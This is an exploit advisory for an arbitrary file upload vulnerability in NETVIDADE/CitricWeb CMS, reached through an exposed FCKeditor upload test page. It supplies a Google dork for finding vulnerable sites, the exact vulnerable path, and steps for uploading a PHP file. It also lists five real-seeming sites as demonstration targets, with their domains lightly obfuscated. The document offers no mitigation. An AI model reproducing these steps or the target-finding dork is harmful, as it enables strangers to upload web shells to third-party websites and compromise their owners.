[+] Exploit Title : NETVIDADE CMS (FCKEDITOR) Arbitrary File Upload Vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://www.citricweb.pt
[+] Google Dork : "Desenvolvido por netvidade.com"
[+] Date: 2015-04-14
[+] Tested On : Windows 7 / Mozilla Firefox
[+] Version : All Version
[+]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#%# CITRICWEB (FCKEDITOR) :
[+] Exploit => plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] First Go To => http://site.com/[path]
[+] Then => http://www.site.com/[path]/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] Select => Select the "File Uploader"> Php ... Upload to : Uploaded File URL:
[+] Demos :
[+] http://contamiXga.pt/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] http://prestenergia.coXm/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] http://grasil-confeccoXes.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] http://alojamentomXonfortinho.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] http://projectomilXenium.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
[+][+][+][+][+][+][+][+][+][+][+]
[+]Discovered By : Cyb3r_Dr4in[+]
[+][+][+][+][+][+][+][+][+][+][+]